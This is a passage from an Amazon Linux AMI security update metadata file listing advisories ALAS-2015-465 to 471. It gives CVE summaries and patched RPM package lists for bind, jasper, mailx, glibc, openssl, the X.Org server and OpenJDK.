name="php55-mcrypt" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.20-2.94.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-465</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-465: important priority package update for bind</title><issued date="2015-01-08 11:36:00" /><updated date="2015-01-08 11:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8500:
A denial of service flaw was found in the way BIND followed DNS delegations. A remote attacker could use a specially crafted zone containing a large number of referrals which, when looked up and processed, would cause named to use excessive amounts of memory or crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8500" title="" id="CVE-2014-8500" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1984.html" title="" id="RHSA-2014:1984" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.35.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.35.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.30.rc1.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-466</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-466: important priority package update for jasper</title><issued date="2015-01-08 11:36:00" /><updated date="2015-01-08 11:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9029:
Multiple off-by-one flaws, leading to heap-based buffer overflows, were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2014-8138:
A heap-based buffer overflow flaw was found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2014-8137:
A double free flaw was found in the way JasPer parsed ICC color profiles in JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8137" title="" id="CVE-2014-8137" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8138" title="" id="CVE-2014-8138" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9029" title="" id="CVE-2014-9029" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:2021.html" title="" id="RHSA-2014:2021" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jasper-libs" version="1.900.1" release="16.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-libs-1.900.1-16.7.amzn1.x86_64.rpm</filename></package><package name="jasper" version="1.900.1" release="16.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-1.900.1-16.7.amzn1.x86_64.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="16.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-debuginfo-1.900.1-16.7.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="16.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-devel-1.900.1-16.7.amzn1.x86_64.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="16.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-utils-1.900.1-16.7.amzn1.x86_64.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="16.7.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-utils-1.900.1-16.7.amzn1.i686.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="16.7.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-libs-1.900.1-16.7.amzn1.i686.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="16.7.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-devel-1.900.1-16.7.amzn1.i686.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="16.7.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-debuginfo-1.900.1-16.7.amzn1.i686.rpm</filename></package><package name="jasper" version="1.900.1" release="16.7.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-1.900.1-16.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-467</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-467: medium priority package update for mailx</title><issued date="2015-01-08 11:37:00" /><updated date="2015-01-08 11:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7844:
A flaw was found in the way mailx handled the parsing of email addresses. A syntactically valid email address could allow a local attacker to cause mailx to execute arbitrary shell commands through shell meta-characters and the direct command execution functionality.
CVE-2004-2771:
A flaw was found in the way mailx handled the parsing of email addresses. A syntactically valid email address could allow a local attacker to cause mailx to execute arbitrary shell commands through shell meta-characters and the direct command execution functionality.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2771" title="" id="CVE-2004-2771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7844" title="" id="CVE-2014-7844" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1999.html" title="" id="RHSA-2014:1999" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mailx-debuginfo" version="12.4" release="8.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mailx-debuginfo-12.4-8.8.amzn1.x86_64.rpm</filename></package><package name="mailx" version="12.4" release="8.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mailx-12.4-8.8.amzn1.x86_64.rpm</filename></package><package name="mailx" version="12.4" release="8.8.amzn1" epoch="0" arch="i686"><filename>Packages/mailx-12.4-8.8.amzn1.i686.rpm</filename></package><package name="mailx-debuginfo" version="12.4" release="8.8.amzn1" epoch="0" arch="i686"><filename>Packages/mailx-debuginfo-12.4-8.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-468</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-468: medium priority package update for glibc</title><issued date="2015-01-08 12:38:00" /><updated date="2015-01-08 12:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7817:
It was found that the wordexp() function would perform command substitution even when the WRDE_NOCMD flag was specified. An attacker able to provide specially crafted input to an application using the wordexp() function, and not sanitizing the input correctly, could potentially use this flaw to execute arbitrary commands with the credentials of the user running that application.
CVE-2014-6040:
An out-of-bounds read flaw was found in the way glibc's iconv() function converted certain encoded data to UTF-8. An attacker able to make an application call the iconv() function with a specially crafted argument could use this flaw to crash that application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6040" title="" id="CVE-2014-6040" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7817" title="" id="CVE-2014-7817" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0016.html" title="" id="RHSA-2015:0016" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.92.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-55.92.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-469</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-469: medium priority package update for openssl</title><issued date="2015-01-11 12:36:00" /><updated date="2015-01-11 12:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0206:
Memory leak in the dtls1_buffer_record function in d1_pkt.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate records for the next epoch, leading to failure of replay detection.
1180235:
CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record
CVE-2015-0205:
The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support.
1180239:
CVE-2015-0205 openssl: DH client certificates accepted without verification
CVE-2015-0204:
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role.
1180184:
CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites
CVE-2014-8275:
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c.
1180187:
CVE-2014-8275 openssl: Fix various certificate fingerprint issues
CVE-2014-3572:
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message.
1180185:
CVE-2014-3572 openssl: ECDH downgrade bug fix
CVE-2014-3571:
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c.
1180234:
CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record
CVE-2014-3570:
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c.
1180240:
CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
CVE-2014-3569:
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to use unsupported protocols, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an unexpected handshake, as demonstrated by an SSLv3 handshake to a no-ssl3 application with certain error handling. NOTE: this issue became relevant after the CVE-2014-3568 fix.
1177249:
CVE-2014-3569 openssl: denial of service in ssl23_get_client_hello function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569" title="" id="CVE-2014-3569" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570" title="" id="CVE-2014-3570" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571" title="" id="CVE-2014-3571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572" title="" id="CVE-2014-3572" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275" title="" id="CVE-2014-8275" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204" title="" id="CVE-2015-0204" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205" title="" id="CVE-2015-0205" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206" title="" id="CVE-2015-0206" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-devel" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-1.82.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-1.82.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-1.82.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-1.82.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-1.82.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-1.82.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-1.82.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-1.82.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-1.82.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-1.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-470</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-470: important priority package update for xorg-x11-server</title><issued date="2015-01-15 14:49:00" /><updated date="2015-01-15 14:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8103:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8102:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8101:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8100:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8099:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8098:
Multiple integer overflow flaws and out-of-bounds write flaws were found in the way the X.Org server calculated memory requirements for certain X11 core protocol and GLX extension requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server or, potentially, execute arbitrary code with root privileges.
CVE-2014-8097:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server, or leak memory contents to the client.
CVE-2014-8096:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8095:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8094:
An integer overflow flaw was found in the way the X.Org server calculated memory requirements for certain DRI2 extension requests. A malicious, authenticated client could use this flaw to crash the X.Org server.
CVE-2014-8093:
Multiple integer overflow flaws and out-of-bounds write flaws were found in the way the X.Org server calculated memory requirements for certain X11 core protocol and GLX extension requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server or, potentially, execute arbitrary code with root privileges.
CVE-2014-8092:
Multiple integer overflow flaws and out-of-bounds write flaws were found in the way the X.Org server calculated memory requirements for certain X11 core protocol and GLX extension requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server or, potentially, execute arbitrary code with root privileges.
CVE-2014-8091:
It was found that the X.Org server did not properly handle SUN-DES-1 (Secure RPC) authentication credentials. A malicious, unauthenticated client could use this flaw to crash the X.Org server by submitting a specially crafted authentication request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8091" title="" id="CVE-2014-8091" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8092" title="" id="CVE-2014-8092" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8093" title="" id="CVE-2014-8093" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8094" title="" id="CVE-2014-8094" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8095" title="" id="CVE-2014-8095" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8096" title="" id="CVE-2014-8096" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8097" title="" id="CVE-2014-8097" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8098" title="" id="CVE-2014-8098" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8099" title="" id="CVE-2014-8099" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8100" title="" id="CVE-2014-8100" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8101" title="" id="CVE-2014-8101" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8102" title="" id="CVE-2014-8102" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8103" title="" id="CVE-2014-8103" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1983.html" title="" id="RHSA-2014:1983" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xorg" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.15.0" release="25.40.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.15.0-25.40.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.15.0-25.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-471</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-471: critical priority package update for java-1.7.0-openjdk</title><issued date="2015-01-22 14:18:00" /><updated date="2015-01-22 16:46:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0412:
Multiple improper permission check issues were discovered in the JAX-WS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0410:
A flaw was found in the way the DER (Distinguished Encoding Rules) decoder in the Security component in OpenJDK handled negative length values. A specially crafted, DER-encoded input could cause a Java application to enter an infinite loop when decoded.
CVE-2015-0408:
Multiple improper permission check issues were discovered in the JAX-WS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0407:
An information leak flaw was found in the Swing component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-0395:
A flaw was found in the way the Hotspot garbage collector handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions.
CVE-2015-0383:
Multiple insecure temporary file use issues were found in the way the Hotspot component in OpenJDK created performance statistics and error log files. A local attacker could possibly make a victim using OpenJDK overwrite arbitrary files using a symlink attack.
CVE-2014-6601:
A flaw was found in the way the Hotspot component in OpenJDK verified bytecode from the class files. An untrusted Java application or applet could possibly use this flaw to bypass Java sandbox restrictions.
CVE-2014-6593:
